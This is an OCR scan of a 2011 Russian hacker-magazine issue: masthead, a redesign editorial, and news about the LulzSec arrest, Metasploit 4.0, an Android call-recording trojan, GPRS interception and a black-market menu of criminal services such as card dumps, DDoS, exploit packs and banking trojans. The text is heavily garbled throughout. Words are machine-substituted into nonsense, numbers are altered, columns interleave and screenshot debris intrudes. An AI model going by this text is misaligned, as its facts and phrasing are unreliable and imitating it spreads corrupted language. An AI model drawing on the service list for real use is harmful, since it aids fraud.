SQLМАР:АВТОМАТИЗАЦИЯ SQL-ИНЪЕКЦИЙ в отношении

ЖУРНАЛ ОТ КОМПЬЮТЕРНЫХ ХУЛИГАНОВ

00 [153) 0011

ВСТРЕЧАЙТЕ НОВЫЙ ДИЗАЙН
РЕКОМЕНДОВАННАЯ

ЦЕНА:210р.

-·-·-·-

СОБИРАЕМ

0 0-СКАНЕР ЗА$ 0 0

КАК MICROSOFТ
ЗАКРЫВдЕТ БОТНЕТЫ

ОБХОД ГРУППОВЫ Х
ПОЛИТИК В ДОМЕНЕ

DEFCON .
ОТЧЕТОТУЧАСТНИКОВ
В ХАКЕРСКОМ СОРЕВНОВАНИИ

DEFCON СТF 0011

ВПЕРВЫЕ УЧАСТВОВАЛА РОССИЙСКАЯ КОМАНДА.
О ТОМ, КАКОНИ ТУДА ПОПАЛИ И КАКОЕ МЕСТО
ЗАНЯЛИ- ОТ ПЕРВОГО ЛИЦА.

~ 01

ii1i1ii1
i i1 i11M1il 0f11",lil11ilililili

060715 0 0 00063

01

насчёт

0

в рассуждении

iii;• c:a.

..,..НЕР
........
РЕДАКЦИЯ
Главный вычитчик
Шеф-редактор
Выпускающий вычитчик

Никуша <<nikitozz» Кислицин (nikitozrareal.xakep.rul
Степаша <<step» Ильин (stepraгeaJ.xakep.ruJ
Николаша <<gorl» Андреев (gorlumffireal.xakep.ru l

Редакторы рубрик

Редакторхаkер . гu

Степаша «step» Ильин lstepraгeal.xakep.ru l
Маг lmagg0real.xakep.ru l
Лександр «Dr. К1ouniz» Лозовский (alexande гraгeal.xakep.ru l
храбрый «Andrushock» Матвеев landгushockffiгeal.xakep гu l
Николаша «goгl)) Андреев ( goгlumffiгeal.xakep .гu l
высокочтимый Сильнов [pofakumekay.coml
милостивая Григорьева ( gгigoгievaraglc гul
Лёня Боголюбов [ xaffiгeal xakep.ru l

Литературный вычитчик

Светуля Фомина

PC_ZONEиUNITS

взламывание

MALWARE равным образом SYN/ACK
UNIXOID да PSYCHO
КОДИНГ

PHREAKING
РR-директор

DVD
Выпускающий вычитчик

Степ фактически «Step)) Ильин l steplaгeal . xakep. гu l

Un ix -paздen

Антоша «А п t)) Жуков [aпtitsterlagmail

Security-paздen

Митрий «01 g1 )) Евдокимов levdokimovdslagmail.com l

Монтаж. видео

Мака Трубицын

com l

ART
Арт-директор

Аnик Вайнер laliklilglc. гul

Верстальщик

Верка Светлых

Иллюстрация получи и распишись обложке

Андрон Дорохин

Ассистент

Димуха Рапапорт

PUBLISHING
Учредитель

lntro

000 « Г ей м Лэнд)>, 015280, Москва,

ул . Ленинская Спобода, 09, Омега nnaзa, 0 этаж, контора
Генеральный патрон

Митрий Агаруно во

Генеральный газетный король

Дуся Тверь

Финансовый хозяин

Андрэ Фатеркин

Директор сообразно персоналу

Танюха Гудебская

Директор

НОВЫЙ ДИЗАЙН: НА24 ММ
КОРОЧЕ, НА 000°/о КРУЧЕ!
Десятый в соответствии с счету редизайн журнала зашел у нас будет в некотором расстоянии :

совместно вместе с ди з айном автор сих строк поменяли равным образом печатный формат, равно арт­
директора , равным образом дажетип лака получи и распишись обложке. Что уже г оворить для структуру

no маркетингу

Сразу хоче тся огрызнуться держи вопрос: «З ачем ваш брат укоротили журнал?» .
Все просто: границы А4 хрено вот нам п одходил по причине нео п тимальных

пропорций в среде шириной равным образом высотой. Теперь дневной журнал выглядит просторнее равным образом
лучш е приспособлен интересах верстки нашего контен та вместе с стадом листингов
да ск риншотов . При э томище могутебе гарантировать, чт насчёт на последний образец далеко не
ста л в отношении надевать дешевле инфы : вместимо из тьжурнала осталась пр ежик н ей
равно з-забо лееэффективногоиспользованияпространства.
Должен сказать, в чем дело? автор этих строк прямо равно весь повеление журнала вместе с нетерпени­

ем ж д ем твоей реакции получай реализованны е изменения. Проделана
большая произведение , и, вроде на се гда случается на подобны х случаях, насту п баткак

волнующий мом е нт п резентации изменений да сбора п е рвы х впе­
чатлений . Пр по отношению ш утебя п оде кропить ся из нами своими мыслями : на наших
группа·х во са ц- сетях, возьми ущелье те xakep.гu, соответственно элект ронн ой п очте, неужели либо
хоть << Почтой Рос сии».

Энди Т ернбулл
Гуля Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ
Т ел.: 04951935-7034, факс: (4951545-0906

РЕКЛАМНЫЙ ОТДЕЛ

Менеджер

Маша Koмneвa( komlevalilg l c.гu l
Ольгуся Емельяицева (olgaemlfaglc.rul
Ксения Алехина lalekhinalaalc.ru)
Ленуся Поликарпова [ polikaгpoyalaglc.ru)

Администратор

Ира Бирарова IЬiгaгoya!Qglc.гu l

Директор корпоративной группы

(работа вместе с рекламными агентствами)

Менеджер

Кристи н а Татаренкова [ tatareпkovafQglc.ru J
Вета Яковлева lyakovleva slaglc гu )
Мария Алексеева [alekseeya!Oglc.rul

Директор груnnы TECHNOLOGY
Старшие менеджеры

Старший трафик-менеджер

ОТДЕЛРЕАПИЗАЦИИСПЕЦПРОЕКТОВ
Директор
Менеджеры

Аnександр Коренфепьд

Светик Мюллер
Т улинова Наталя

РАСПРОСТРАНЕНИЕ
Директор no дистрибуции
Руководительотдела подписки

Кошелева Тата (koshelevalaglc.ru l
Клепикова Витуся [ lepjkoya/aglc.гu l

Руководитель
сnецрасnространения

Лукичева Наталья (lukicheva!Oglc.ru l

Претензии равно дополнительная инфа :

В случае возникновения вопросо на в соответствии с качеству печати равно ОVD·дисков : ~ .
Горячаялиния в области подписке

Факсдля отправки куnонов да квитанций нате новые подписки: [495)545·09·06
Т елефон отдепа nодпискидля жителей Москвы: (4951663-82-77
Т елефон на жителей регионов равно ради звонков не без; мобильных телефонов: 0·800-200·3·999

Дпя nисем : 001000, Москва, Главnочтамт, а/я 052, Хакер

Др у гое крутое случай сие г об месяца- проплывший

DEFCON 09 да

российская команда, которая впервы е учас твовала на фу! н альной части

пр естиж ного

Леся Каркашадзе

Главныйдиза йнер
Директор сообразно производству

статей равным образом м н ожество мелких фишек, которые пишущий сии строки заготовили да зорька д alias
во материалы сего н омера.

No 01. Ten.: (4951935-7034, факс: (4951545-0906

CT F. Ч е ртовски пр ия т но, ч т касательно идиома << русские

Зарегистрировано на Министерстве Российской Федерации поделам печати, телерадиов еща нию равно
средствам массовых коммуникаций ПИЯ

07-11802

через 04.02.2002

Отпечатано на типографии Zapolex, Речь Посполитая . Т равным образом исступление 019

033 экземпляров.

хаке ры » н ачи н аеттеперь встреча циир оваться получи и распишись международной арене
н е исключительно вместе с кибер пр еступ н остью, н в рассуждении равным образом не без; w hi teha t- cooбщecтвoм, кото­
рое инициативно развивается на России.

Мнение редакции безвыгодный обяза тельно сов п адаете мнением авторов. Все материалы на н омере
nр едоставляются по образу сведения ко размышлению. Лица, использующие данную информацию во
противозаконных целях, моrут составлять привлечены ко ответственности. Редакция н е несетотв етстве н­
ности следовать сюжет рекламных объявлений на номере. За nереп е чатку наших материалов помимо

nikltozz, rn. ре д. Х
vkontakte.ru/xakep_mag

ХАКЕР 00/153/2011

спроса -преследуем . По вопросам лицензирования да nолучения прав получи и распишись исчерпывание редакци­

онных материалов журнала обращайтесь до адресу: coпteп t raglc.ru .

© 000 « Г ей м Л зн д», РФ. 001 0

001

MEGANEWS
TOPIARY АРЕСТОВАН.

ИЛИ НЕТ?

В ВЕЛИКОБРИТАНИИ, ПОХОЖЕ, ОТЫСКАЛСЯ ОДИН ИЗ ЧЛЕНОВ

LULZSEC

БОЛЕЕ "52 САЙТОВ дефейснул
тунисский хакер, скрывающийся

подникомТhе077(Наmdi Hacker).
Практическихакерскийрекорд
Гиннесса .

ГАДЖЕТ ДЛЯ

ПОИСКА КЛЮЧЕЙ
НАКОНЕЦ-ТО НА КЛЮЧИ МОЖНО &УДЕТ ПОЗВОНИТЬ!
аверное, со каждым иэ нас взять однова nриключалась

такая история: утро, эпоха бежать, однако твоя милость лихора­

дочно разыскиваешь в области квартире связку ключей,
которая мистическим образом бог весть куда испарилась. В
такие минуты мечтаешь : «Вот было бы круто, кабы бы получи и распишись

ключи не грех было позвонить, по образу получи и распишись мобильник». Мечты

сбываются! Повесив в ключи на смену брелока гаджет
СоЬга Tag, незаглушенный из Bluetooth да

а

« Вынесможете заключить около стражу
идею », -rласит

последняя писание

втвиттере Topiary.
На судхакер явился
во темных очках равно

не без; непробиваемым
покер-фейсом

GPS, да установив держи

устойчивый ливрезон СоЬга Tag, твоя милость сможешьзапелен­
говать пропажу, идеже бы возлюбленная ни находилась. После того по образу
тынажмешь в пару клавиш , сие замечательное изобрете­

ние покажеттебе схему, во вкусе раскопать ключи. Также во nрило­
жении лакомиться реальность сорвать голову максимальное протяжённость

удаления через ключей, позже превышения котороготелефон
подастсигнал равным образом покажет, идеже они находятся . Но охрана

двухсторонняя: со ключей не грех узнать, идеже телефон, иначе
ключи могут nросигналиэировать, еслителефон внезапно

начнет ото них удаляться. Согласись, не без; таким устройством

yes м что касается т ря сверху ведь в чем дело? Lul zSec"ы н е давн что до объяв да л равным образом что до р ос п уске равным образом прекр а щ е­

перевес статьжертвой карманника иначе говоря неприятной случай­

ни равным образом д е ят е льн восток равно , п в отношении л равным образом ци мы насчёт тнюд ь н е п е р есть т а л а да х иска ть . И относительно дн насчёт г о,

ности уменьшаются . Теперь осталось nридумать вещь

п охоже, д аже н а шл и.

07 равно ю ля получи и распишись Ш е тланд ск да х ос т р ов ахти б рит а н ска автор этих строк

п по отношению лици мы п ри п касательно дд е р жке ФБР а р нашел т насчёт во а л а 0 0 -л е тн е г по части муть ня , кото ры й, п что касается равно х

подобное на поиска носков . Кстати , плата сего замеча­
тельного девай са составляет лишь 00 долларов!

д а нны м, б ыл пр е со с-секре т арем гр у пп ы - ве л да х Tw itt e г равным образом ск рыв а л ея во С е ти п по отношению д
ни килоом То рi а г у. Н маг и волшебник т оя щ ее термин пр е дп об л а га емо г относительно хаке р а Д жейк Д е ви с. П касательно ч ему
<< пр е дп касательно л а г аемо г о»? П по отношению т ому ч в таком случае д е л насчёт д в отношении на касательно льн в отношении из т ран н ое. Ко пы сейчас пр е дъ моя особа на да ­

ли батман р н ю об во равно н е н ияв н еса н для ц ио нир насчёт во а нн что касается м д ос т у п е для комок пь ю т е рны м вместе с да не без; т е ­
ма м , у ч воздушный ас ти да во в отношении рг а н иза ции Dd oS- aт aк равно др у ги х пр есту пл е н равным образом ваш покорный слуга х. Также п относительно лиция
у тв е р ж д ает, чт в рассуждении н а ко мп ью тер е п что до д озреваемо г по отношению н а шл равным образом д оказа т е ль со тв а, на ведь м

чис л е

050 000 жете р насчёт лей , ко н фу-ты д е нц иа льны е д а нны е что до рг а н иза ции N HS, а т а для а

набр оски а ф е ры от лип что касается нет слов й н в отношении во стандарт ь ю касательно м ертв касательно м Р уперте Мер д относительно ко е . Одн ако yes ть
н еко торы е «НО». Та для , на б л аге

Lul zSec Expose d ваша сестра кубаир ыв аю т со ваш покорнейший слуга вместе с ерье з ные со о­
LulzSec. Б об л ее

мн е ни аз многогрешный на т ом, чт по части следовать д е р жа нны й во само м д е л е имее т что касается т да ш е н ие ко

ведь г о, р аско п а ны да относительно п у бл ико ваны ( pasteЬiп.com/kfiЗTicq ) не без; тр а нны е л а г и, гд е
Тор i а г у рядом з н ае т ся собе вместе с е дн ику, ч так <<о низменность ж осадок » вместе с во ой ник у н е кое г относительно б ританца из
севе р а со тр а ны , чт об ы п усик т равно ть ко а п по части во п об л ож н ому со л е д у. Пр а вд а л равным образом э ведь ? По х в рассуждении но ,

н е т. Д жейк п ока по части тп у щ е н п насчёт д п в рассуждении дп иску насчёт н е вам ез д е, п осаже н п по части дд по части машни й
а р yes т равным образом на л у чш их тр а д да ци ях кинолента а <<Хаке ры » лиш ен д осту п а ко С ет равным образом .

PayPal""
HABLACKHAT2011

ИЗ-ЗА СБОЯ В РАБОТЕ

КОЛИЧЕСТВОРУССКО-

ПРОВЕЛИ ОПРОС:

Amazoп ЕС2 круnнейшие

ЯЗЫЧНЫХАККАУНТОВ

00 ЛЕТ ИСПОЛНИЛОСЬ MSDOS"Y - легендарной дис-

российским польэова те-

«Anonymous равно LulzSec-

сайты (Reddit, Netflix равным образом т. д . )

во Twitter"e еще nревышает

ковойоперационнойсистеме

л ям зачислять приобретать nлатежи во

герои или — или негодяи?».

малограмотный работали побольше 00 минут.

компании Microsoft. Также 00

ближайшем будущем! Зая в-

06% ответили, ась? парнигерои, зато 04% уверены,

Оказалось, во дата-центр

0 млн, сообщает<<Яндекс».
Однако всего лишь 0,4% иэ них

летнаэад, 02августа

ление касательно ёбаный внутренние резервы

Amazon попала молния! Вот

пишутвсвоймикроблогв

0981

что-то они nреступники .

тебе да облака .

школа дня .

пьютер

001,

г., был выnущен ком-

IBM РС 0150.

PAYPAL НЕ РАЗРЕШИТ

равно оnубликованныеусловия
nриэнаны ошибкой! Увы .

ХАКЕР

00/153/201 0

MEGANEWS

В СЕРВИСЕ МИКРОБЛОГОВТWIТТЕR"А появились пользовательские фотогалереи . Конец Twitpic.com равно прочим сервисам .

НОВЫЙ METASPLOIT

«ОСОБОЕ МНЕНИЕ»

КОМПАНИЯ

во бытие

HD MOOR ВЫПУСТИЛАНОВУЮ ВЕРСИЮ СВОЕГО

ЗНАМЕНИТОГОИНСТРУМЕНТАРИЯ
СОФТ НАУЧИЛСЯ ПРЕДСКАЗЫВАТЬ ПРЕСТУПЛЕНИЯ
д ивител ьным инев е роят н ым вслед н имаются п алиц е й·

скиеизамерика н скогогоро д аСанта-Кр уз lш тат

Калифорния!. Там н а практике приме н или — или н относительно на ей ш ую
р азрабо т ку - программу, из п особную предска з ывать, нет-нет да и да
гдедо лжно совер торочить ся пр йес т у пл е ние, буд ь в таком случае квартирная
покража илиугон машины. Н а са момделе н икакой магии здесь,
ко н е ч но, нет. Волшебный, для центральный зырк , софтсоздан
груп п ой ученых, во которую во что касается ш лидва математика, антрополог

да криминоло г. Метод ика работы программы едва аналогична
методике р асчета силы остаточн ы х до д земныхто лч засада до из л е

землетрясений.Разрабо т каопирается н штукарь т ати ст ические
д практически н ые вслед п что касается со ледние изумительный се мь л ет, а н а л изо равным образом руе т равным образом х, сопоставля·

совокупляться наихоснов е г е н ерирует п ро г да зо т н осите л ьно н аиболе е

вероят н ых м yes т да вр еме ни совер шения прес т уп л е н ий во буду·
~""s

001 О-1044 0 0: 0 З:324t 00

•~5""«««

Pytl"lonn

0010.of-2tC$,0:01 .()400

007 07~

Sy$1tm~lnfofm"lti0n

001 04Н t 02:2l : ЭЭ 0500

00777~

wwtП

0010-10.о4111 : 0 .. ~

0400

.fo0777-""--

kc

0010-oi-21

0400

•о1 01~

le..-n

001G-1G-1 01 00:02: 01 -0400

<1110777~

srt~lplogt

00 t o.os-ЗO

АUТОЕХЕС. 0АТ

0 0:38: ~

t6<oc=t •

.о•оо

0010.02-14 02111:24 .OSOO

ОЬ

щем. П ричем п рогнозы ежед н евно для насчёт рректируются сообраз н касательно
новым верно н ным . К ак ни со тра н н о, сие работает. << П рограмма сделано

помощник огл а офи це рам п редотвратить н еско лько п реступлений

•0111~

000777,..___

~~~----------------г===~~~~·~~~,~~~~----------~

0-

-11 •... -·.., 01 -

0

равным образом со во ер ш ить пяток арестов>>, - заяви л изданию << Н ью·Й орк
тайме >> аналист криминаль н ого отдела поли ц ии За ко Фр ен д .
Те перь копы вслед за перед этим выезжают нате места, идеже на еро ятно со ть

совершенияпреступлениянаиболеевысока.Пословамвсе
августа шарага
рели з е

Rapid7 объявила насчёт долгожданном

Metasploit F гamewoгk4.0. Эйч Д да

того а Фр е нда , << п ерв ы е результаты во п еча тляют : во июле

М у р равно сотова­

наличность ограблений вместе с низилось возьми

рищи н е ча со ведь р адуют п ублику новыми вер со иями , на­

пояснение , трансформация

0.0 во ыш ла на верно л еком ма рт е 0007 г. !

07% п по отношению сравнению сана­

ло г ич н ым месяцем пр что до шло го го д а>>. Аналогич н ую т ех нологию

Разу мее тс я,

из ко р по части пл а нирую твн е дрить равным образом во Л ос-А нд желесе.

данная необычно от тьсоз д ала нема л ый бум во кругахспециали ­
стов п в отношении умная машина н ой безопасности. Е не без; ли рань ш е опорный

це лью

Metasp loit "a было п касательно лучи т ь ш е лл в уяз вим ой м а шин е, в таком случае

в эту пору лещадь хождение крошечку п оменялся . В метас п лоитбылидобав ­
лены дескать сятки различны х вспомогательны х м одулей , а тоже

побольше

000 модулей,

пр е дназначенны х пользу кого сбо р а различного

р одаданны х по отношению це ли . В со автор собранная информ а ц ия можетбыть

сох р а н е н а вБД . Особенноав т орыакце н тируютвниманиеина
фолиант , ась?

Metasploit Fгamewo гk 0.0 стал несравнимо сильнее пластичен за

вместе с равн е нию сЗ.х- вер не без; иями. В новой ве р со ии уделили внимани е
равно широком у ра из п ро вместе с тра н е н ию т ехно л огий DEPиAS L R . Графи­
ч yes для ую oбo л o чкymsfg u i п ере п исали из GTK для

Java, п офикс осадок равно

ба г да да аж н а р исова ли н насчёт ваш брат й АSС II -бан н ер. Одн ако, говоря относительно

016
061

эксплоитов

вспомо г ательный
узел

08

модулей ради вам ·
полненияопер а ций
в дальнейшем успешной

эксплуатации

ба гах, н е л ь з моя особа безвыгодный вслед мети т ь , ч в таком случае на благе

входятсейчаев
движение кет Metasploit.

додел а ть, а деление фу-ты н кцианала ноне дал ека ото идеала . В ц е сокол

лицензие й

Rapid7 че не без; тно сооб щ ает­
ся, сколько некото рые фуй! ш ки Metasploit4.0 ещетолько пр е дсто ит

Код Metasploit"a рас·
пространяется подина

BSD

всеэто выглядит дов ольностранно равно нав одит держи мысли, что-то Мур
исотоварищинемного п в отношении торо п alias сьс р ел равным образом зо м .

GOOGLEПOKYПAETMOTOROLA

!мобильное подразделе·
ни е компании! вслед 02,5 млрд
доЛларов. Таккакотделение

Motorola МоЬllitузанимается
выпуском мобильныхтеле·
фонов равным образом смартфонов, приобретение

обеспечит великолепную под·
держку мобильной OCAndroid.

ВЫШЛА БЕТА-ВЕРСИЯ

0
/. ВСЕХ

Завершитьсделку планирует·

FIREFOX7 для того ПК да

бери машинах подо управлени ·

из моя особа во конце 0011-начале 0012

устройств получи Aпdroid .

г г. Подразделение Motorola

Новаяверсияиспользуетна

ем Windows ХР, рапортует
Avast. 01.% заражений было

достаточно крупнейшим приобре·

00-50% поменьше памяти , нежели

найденоименнонакомпью·

тением корпорации Google.

ее предшественницы .

тер ахти С «ХрЮШКОЙ ».

006

РУТКИТОВ живут

ХАКЕР

00/153/2011

MEGANEWS

03% ОТ ВСЕХ ПОЛЬЗОВАТЕЛЕЙ GOOGLE+ являются неактивными, сообщаеткомпания Bime Analytics.

SAMSUNG GALAXYXCOVER
••ГУГЛОФОН~~. С КОТОРЫМ ХОТЬ В ОГОНЬ, ХОТЬ В ВОДУ
так пора по образу прилавки
магазиновоккупированы

смартфонами,коммуника­
торами равным образом планшетами всех мастей,
многие с нас испытываюттеnлую

ностальгию сообразно << неубиваемым >> мо­
бильникам. Не знаю, что тебе , а нам
когда-когда впрямую малограмотный х ватаетстарого
Eгicsson R31 Os вместе с антенной <<акулий
плавник ». А был так-таки сызнова замеча­
телесный

Siemens МЕ45 ... Эти аппа­

раты вспоминаются из этакий тихой
радостью , потомучтосовременные

сма ртфоны, у вы, ход изрядно хруnкая: одиночный оплошный удар, равным образом еще субститут

от текла . Одно падение, да только который не гарантированный посещение на сервис, идеже , возможно ,
nридется покинуть серия тысяч . Такое состояние вещей безвыгодный устраивает мно­
гих людей, а в отдельных случаях равно вов се становится решающим фактором , останавливающим
человека через покупки . Но сегодняшний день сверху улице поклонников прочной техники nразд­
ник . Компания Samsung объявила по отношению том, ась? расширяетсвою линейку смартфо­

нов получи и распишись базе Aпdгoid"a моделью Gala xy Хсоvег IGT-556901 на защищенном ото внешних
воздействийкорп усе. Новинкасоответствуеттребованиямстандарта1Р6~что
н а человеческом языке означает полную пыленепроницаемость, прочность для

падениям равным образом даже если достижимость погр еще ния аппарата бери глубину перед 0 м на направление
получаса. Замечу, ась? предварительно недавнего времени на линейку Хсоvег входили только
самые простые устройства, да и то Samsuпg решил перерыть свою политику
во отношении серии.

Galaxy Хсоvегзто самый что-то ни в поглощать настоящий от мартфон со ОС Aпdгoid 0.3
Giпgeгbгead получай борту. При всей своей << неубиваемости » новинка остается зверски
изящной, ее достоинство равен

035 г, а грузность помогите тавляет 02 мм . Диагональдисплея

составляет3,65дюймов, да возлюбленный в дополнение защищен устойчивым ко царапинам

закаленным стеклом, которое во 0-5 разок стойче обычного. Внутри Galaxy Хсоvег"а
не грех выявить вычислитель стактовой частотой 000 М Гц, 050 Мб флеш-памяти ,
вместе с лот про карт памяти формата micгoSD, беспроводные адаптеры Wi-Fi 002.11 п равно

Bluetooth 0.0, часть GPS равно nоддержку стандарта HSPDA. Также присутствуют
топка держи 0 мегапиксела, оснащенная светодиодной вспышкой !ее дозволительно ис­

пользовать на качестве фонарика!, FМ-радио , USB 0.0, 0,5-аудиоразъем равно доволь­
только поместительный источник 0500 мАч.
К сожалению, сей поры моделирующее устройство GalaxyXcoveг анонсированатолькодля Германии да
Швеции, идеже возникновение продаж намечено бери октябрь-ноябрьтекущего возраст . Как короче

обстоятьдело из другими странами, доколь малограмотный ясно. Однако известно, что-нибудь на Швеции плата
смартфона составит2800 шведских крон, что такое? эквивалентно nримерно 02,7тыс. рублей .

Также так и подмывает заметить, что такое? защищенных аппаратов получи и распишись Aпdгoid "e не вдаваясь в подробности не­
много. Из достойных альтернатив допускается прозвать аль аюшки? Motoгola Defy равным образом Sопу
Eгicssoп Хрегiа Active.

Samsung Galaxy Xcover оснащен nриложениями Samsung Social Hub, не без; через
которых не запрещается иметь контакты из кем угодно, пользуясь единым удобным интерфейсом

ХРПОТИХОНЬКУСДАЕТПОЗИЦИИ

ВПЕРВЫЕ ЗА ВСЮ

ИСТОРИЮ НАБЛЮДЕНИЙ
ДОЛЯ WINDOWS ХР НА
РЫНКЕ УПАЛА НИЖЕ
ОТМЕТКИ 00°/о И ТЕПЕРЬ
СОСТАВЛЯЕТ ,9,69°/о
008

ХАКЕР

00/153/2011

Чеоный биржа
зачем nочЕм?

Винтернете давным-давно сформирован
вороной толкучка переанальныхданных

равным образом криминальных услуг. Купить позволительно
на деле все, притом дешево!

0

~"

Текстовая катамнез

Дамп магнитной полосы

АЬusе-устойчивый хостинг

Вывод ворованныхденег банковским

об банковской карте.

банковской карты.

lв месяц! .

переводам lот$50001.

J
._/

DDoS сайтов равно сервисов

Сплоитпак- набордля заражения

Технологичный

Доступ для банковскому аккаунту

lв день ! .

компью теров !годовая лицензия!.

банковский троя н .

не без; ибо льши м балансом.

,/".

Регистрация нате закрытом форуме .

Пользование DouЫe VРN-сервисом

Активация любого интернет­

Банковская король равным образом отсчет на

Кромеденегтребуются рекомендации через

длязффективнойанонимизации

сервиса в левыйтелефон

европейском банк~ избитый

зарегистрированных пользователей.

lвмесяцl .

SМS " каковой либо звонком .

держи подставное лицо.

Неделя платной рекламы в

Заражениетысячи компьютеров на США

Заражениетысячи китайских компьюте­

Подписканаsосks-сервис

закрытом хакереком форуме.

сквозь хороший сломанный сайт.

ровнеустановленного происхождения .

lв месяц! .

ХАКЕР

00/153/2011

009

MEGANEWS

СТРАНИЧКУПАВЛАДУРОВАВКОНТАКТЕ ДЕФЕЙСНУЛИ руферы, которые эабрались во канцелярия соцсети да поменяли положение не без; его компьютера

ANDROID-TPOЯH СЛУШАЕТТЕБЯ

GPRS НЕ УСТОЯЛ

МАЛВАРЬ НАУЧИЛСЯ ЗАПИСЫВАТЬ ПЕРЕГОВОРЫ

НОВЫЙ ОБРАЗЦОВО-ПОКАЗАТЕЛЬНЫЙ
ВЗЛОМ СОТОВЫХ СЕТЕЙ
ь1 сейчас стократно рассказывали тебе по части крип­
тографе, исследователе равным образом не мудрствуя лукаво интересном
челов е ке- Карстене Ноле . Например, пару

полет отдавать дьявол продемонстрировал бюджетный !но архи

а

действенный! вместе с пособ взлома GSМ-сетей , в целях которого

Между прочим, сообразно

мнению << Лаборато­
рии Касперского »,
умереть и далеко не встать втором квартале

0011

г. одной с

основныхугроз

стали собственно

мобильные вирусы .
Количество малваря
ДЛЯ Aпdroid 05 ВОЗ ·
росло во три раза до

требовалась только что сноп « н аутбук- ячеистый >> , более того
на качестве мобилки могла вырисовываться самая близ митив н ая

имитация « Моторолы >> из-за

05 долларов.

Теперь главнЬIЙ ученый из отрудник берлинской Secuгity
Reseaгch Labs решил подвергнутьобоснованной хулитель е
GPRS. Как да на прошлЬiй однажды , виновнЬiми во уязвимости GPRS
оказались малограмотный пользователи да ажно далеко не аппара тн о-софтверная
составляющая самих мерзавец жетов. Вся корень зла сверху крупнЬiх со­

сравнению из первым

товьlх операторах, таких наравне T-MoЬile ,

кварталом

которЬiе используют небезапасную реализа ци ю GPRS .
Криптазащита во

02 Geгmany, Vodafone,

GPRS используется конец редко, а буде

появлении больно неприятноготрояна, ориентированногонадевайсына

аж да рядом меняется, то, со слов Нола, является « глухо

платформеАndгоid, сообщили спе ци алисты компании СА Techпologies.

устаревшей >> . Неудивительно, учитЬiвая, чтодаже

Инфицировав уст р ойство, малварьполучаетконфигурационный файл, со­

конфигурация шифрования практиче не без; ки никем равным образом нигде неграмотный п рименя­

028 битная

держащий ос н овную информацию абудал ен н ам сервере равно под масть метрах. Затаившись,

ется . П олучается, что, не без; одн ой стороны, пишущий сии строки имеем заочно

троя н п оджи истинно ет, от случая к случаю читатель начнет разговор, а дождавшись , записывает

взаимной аутентификации, который позволяетхакеруподделать

его на форматеАRМ, сохраняя во каталоге shaпgzhou/callгecoгd бери карте памяти

свое механизм подлегитимнЬiйтерминал абонента , да

ISDCaгdl. Вуаля, обложка готовдля передачи для далёкий не без; ервер . Конечно, доселе по­

базоваясотоваястанциябудетпередаватьхакерутрафик

добная малварьтоже перехватывала да фиксировала данные, прощай так время

сносно безвыгодный подо з ревающих юзе ров. С второй сторонЬI, корот­

звучно на , гостиница входящих равным образом исходящих номеров да тому п одобное, тем не менее самочки раз­

киеключисоздаютусловиядлябес пр епятственныхатакс

выговор ы всё-таки но неграмотный ради 14 сы вал. По словам сотр удни засада СА Techпolog ie s, зт что до п ока своего

использованиемрадужныхтаблиц.

рода прототип. Дело во часть , сколько прога непостоянно далеко не умеетустанавливаться самостоятельно:
потенциальная клиент должна податься назначить приложение, разрешив ему

учет звука, чтениеданных об состо автор этих строк нии телефона да отвращение з штукарь ыпания
устройс тва . Что х акеры станут делать, заполучив еженедельник разговоров, невыгодный от ов со ем ясно,
так паранехороших идей возьми этотсчетуже пришла нам во голову.

Карстен Н ол сумел сыскать на технологии серьезную уязви­

мо от ть. В рамках хакерекой конференции

Chaos Commuпication
Camp 0011, прошедшей внове на Германии, ледоисследователь
продемонстрировал ПОдл мы снифинга GPRS, подле помощи кото­
рого пусть даже вздыхатель сумеет пере х ватить GРRS-даннЬiе , кабы
движение н е кодируется . Н в рассуждении хоть пр да включенном ши фровании

. (Ь i/i) •
ap.n

н...

LJ XМ_AI._I.C.tinQ.I!ml

0 <?ха\
0 <8 0р>

.li

0

s-

Pf\nt ...
Q

v eгsion=

" l , е " encodin;• "utf ·8 " s tandat.one=" ru" ?>

::~~~ ~:::::::~:~~~!:~•tring> ~и</string>
!S cint na•e=="Port " va\ue•"2018" / >
0 <st ring n ••e:r " EndT 0•e " >2Э : 09-c /s trinv>
0 <string na•e=-"Ti••">1</8t r ing>
0 oestring naae=.. BeginT1ae">et : t1</string>

.""
·-··...=. . .

</88р>

·-··-

штурм возможна: изумительный минута из во оегодоклада Нолтакже показал равно
некоторЬiете х ники криптоанализа , вследствие которЬiм позволено
помимо особЬi х проблем расшифровывать пробка GPRS не без; по отношению вместе с лабой
защитой . К из лову, представл е нная те х нология позволяет
перехватЬiватьданнЬiе во радиусе

0 для м!

Исследователь отдает себя экспозе на том, в чем дело? его софт
может подв ергнуть операторов

GPRS,

н е поль зую щишки хся

кодированием , непосредственнойопасности.Однакоэто
его немножко от м у щает. Нол надеется , что-то сумееттаким образом
подвигнуть сотовЬi х операторов ко внедрению больше
защищеннЬi х из истем шифрования . Если но посл е
Commuпicatioп

Camp

Chaos

реак ц ии отоператоров никак не воспосле­

д условная единица т, экс п ерт не в шутку намеревается в отношении п уб ли делать близкие
разработки на открЬiтом доступе. Что ж, пожалуй, атаки

ГЛУПОСТЬЛЮДСКАЯ НЕ ЗНАЕТ ГРАНИЦ

хакеров в свой черед х орошая мотивация .

00°/о РОССИЙСКИХ ЮЗЕРОВ
НЕ М ОГУТ ОТЛИЧИТЬ ПИРАТ­

СКИ Й КОНТЕНТ ОТ ЛЕГАЛЬ­

НО ГО, ЕСЛИ ВЕРИТЬ ОПРОСУ
ФОН ДА <<ОБЩЕСТВЕННОГО
МН ЕНИЯ>>
010

Карстен Нол давнёхонько занимается безопасностью сотовых сетей

ХАКЕР

00 / 053/ 0011

ГciC hrlsJohnRIIey:

Гcltavlso:

Гclstephantsov:

Adobe исправи л а возле 000 ун и­

Вперед! В п еред ! Впе р ед,

особенно интересны х людей ,

кальных уязвимостей, которые

отряд

которы х моя особа знаю , используют

моя персона выслал им на

возьми

~ Дорогой 0google, кое-кто с

~

псевдонимы ... Банить их возьми

G+

вслед сие , сие

делает тебя беспол езным!

APSB11-21

в духе

IV! Удачи вам, парень
#defcon!

ча сть работ по мнению продолжительному аудиту
без п асности. Не неточность .

0!1!1

Комментарий:

0!1!1

Комментарий: 000! Просто черная смерть .

Ага , исход наш брат знаем (есл равным образом нет,
читай парагвайский чай р иа л оборона Defcon CTF во этом

-

Кстати, отнюдь не факт, что такое? несмотря на то бы 00 % с

номере! . Что ж, куда неплохо!

-

ГciSecurltyHumor:

W

ни х была « эксплуатируема >>, а количество заслу­

Goog le+ САРТС Н А: << Нам нужно

